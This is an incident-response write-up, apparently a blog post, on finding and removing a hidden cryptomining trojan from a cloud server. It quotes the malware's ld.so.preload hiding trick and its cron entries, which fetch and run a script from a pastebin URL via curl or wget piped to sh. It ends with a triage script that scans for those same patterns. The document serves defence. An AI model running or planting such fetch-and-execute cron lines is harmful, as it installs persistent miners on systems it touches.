Cloud Shield Situational Awareness detected an urgent security event on your server: mining trojan


    Problem description: received an alert notification from Alibaba Cloud.

    Logged in to the server and checked the process list: no process with abnormally high CPU usage was visible.

    Checked the /etc/ld.so.preload file; it points to /usr/local/lib/libdns.so:

    [root@SJ-pre-release ~]# cat /etc/ld.so.preload
    /usr/local/lib/libdns.so
    

    Checked the /usr/local/lib/ path to confirm the libdns.so file is there.

    Checked the scheduled tasks and found an unfamiliar cron job:

    [root@SJ-pre-release ~]# crontab -l
    */23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    

    Solution:

        ### Empty /etc/ld.so.preload
        [root@SJ-pre-release ~]# echo "" > /etc/ld.so.preload
        ### Delete the /usr/local/lib/libdns.so file (the path listed in ld.so.preload above)
        [root@SJ-pre-release ~]# rm -rf /usr/local/lib/libdns.so
        ### Delete the cron job from both crontab locations
        [root@SJ-pre-release ~]# cat /var/spool/cron/root
        */23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
        [root@SJ-pre-release ~]# rm -rf /var/spool/cron/root
        [root@SJ-pre-release ~]# cat /var/spool/cron/crontabs/root
        */31 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
        [root@SJ-pre-release ~]# rm -rf /var/spool/cron/crontabs/root
    

    Checked the process list again: a process named kworkerds, PID 14711, is now visible with CPU usage of 397.5%. It was invisible earlier because the preloaded libdns.so hooks the libc functions that ps and top use to enumerate processes; once /etc/ld.so.preload is emptied, the miner shows up.

    [root@SJ-pre-release ~]# top
    top - 09:12:50 up 229 days, 21:41,  9 users,  load average: 4.23, 4.12, 4.08
    Tasks: 145 total,   1 running, 144 sleeping,   0 stopped,   0 zombie
    %Cpu(s): 99.8 us,  0.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
    KiB Mem:   8011936 total,  7647536 used,   364400 free,   303504 buffers
    KiB Swap:        0 total,        0 used,        0 free.   301404 cached Mem
    
      PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
    14711 root      20   0  566768  35644    756 S 397.5  0.4   1719:53 kworkerds
    11701 root      20   0 4730228 797664  12764 S   1.7 10.0 536:07.20 java
    18094 root      20   0       0      0      0 S   0.3  0.0   0:00.05 kworker/3:2
    18155 root      20   0  123696   1684   1156 R   0.3  0.0   0:00.08 top
    22408 root      20   0 1281204 193204   5124 S   0.3  2.4  77:45.91 node
    

    Use ps to find the path of the process:

    [root@SJ-pre-release ~]# ps -aux | grep 14711
    root     14711  397  0.4 566768 35644 ?        Sl   02:00 1720:38 /tmp/kworkerds
    root     18157  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
    Kill the process first, then delete the file:
    [root@SJ-pre-release ~]# kill -9 14711
    [root@SJ-pre-release ~]# ps -aux | grep 14711
    root     18175  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
    [root@SJ-pre-release ~]# rm -rf /tmp/kworkerds
    

    Problem solved.
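The checks above (a populated /etc/ld.so.preload, cron lines that pipe curl/wget into sh, and a process that only becomes visible after the preload library is removed) can be scripted as a triage helper. The script below is an added example, not part of the original post; the "hidden PID" check is an assumption about how such preload libraries hide: they hook readdir(), so comparing a stat()-based probe of /proc/<pid> against the directory listing reveals entries the listing omits.

```bash
#!/bin/sh
# Added triage helper, not part of the original post. It checks the three
# indicators the write-up relies on: a non-empty /etc/ld.so.preload whose
# library is on disk, cron lines that pipe curl/wget output into a shell, and
# PIDs that exist under /proc but are absent from its directory listing (the
# hiding trick a preloaded library performs by hooking readdir). File paths
# are parameters so the checks can also run against copied-out files.

# Print each preload entry and whether the named library exists on disk.
preload_entries() {            # $1 = path to an ld.so.preload file
    [ -r "$1" ] || return 0
    grep -v '^[[:space:]]*$' "$1" | while IFS= read -r lib; do
        if [ -e "$lib" ]; then state=present; else state=missing; fi
        printf 'PRELOAD %s %s\n' "$state" "$lib"
    done
}

# Print cron lines that fetch a URL with curl or wget and pipe it to sh/bash.
suspicious_cron_lines() {      # $1 = path to a crontab file
    [ -r "$1" ] || return 0
    grep -E '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' "$1" || true
}

# List PIDs that stat() finds under /proc but readdir() (ls) does not report.
# Processes starting or exiting mid-scan can appear once; rerun to confirm.
hidden_pids() {                # $1 = highest PID to probe (default 65535)
    max=${1:-65535}
    listed=$(ls /proc 2>/dev/null | grep -E '^[0-9]+$' || true)
    i=1
    while [ "$i" -le "$max" ]; do
        if [ -d "/proc/$i" ] && ! printf '%s\n' "$listed" | grep -qx "$i"; then
            printf '%s\n' "$i"
        fi
        i=$((i + 1))
    done
}

# Run the live checks against the current host with: sh triage.sh run
case "${1:-}" in
run)
    preload_entries /etc/ld.so.preload
    for f in /var/spool/cron/root /var/spool/cron/crontabs/root /etc/crontab; do
        suspicious_cron_lines "$f"
    done
    hidden_pids
    ;;
esac
```

Any PID printed by hidden_pids, or any "PRELOAD present" line, is the point at which to capture the binary and library for analysis before removing them.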

Original source: https://www.cnblogs.com/sujc-blogs/p/9722480.html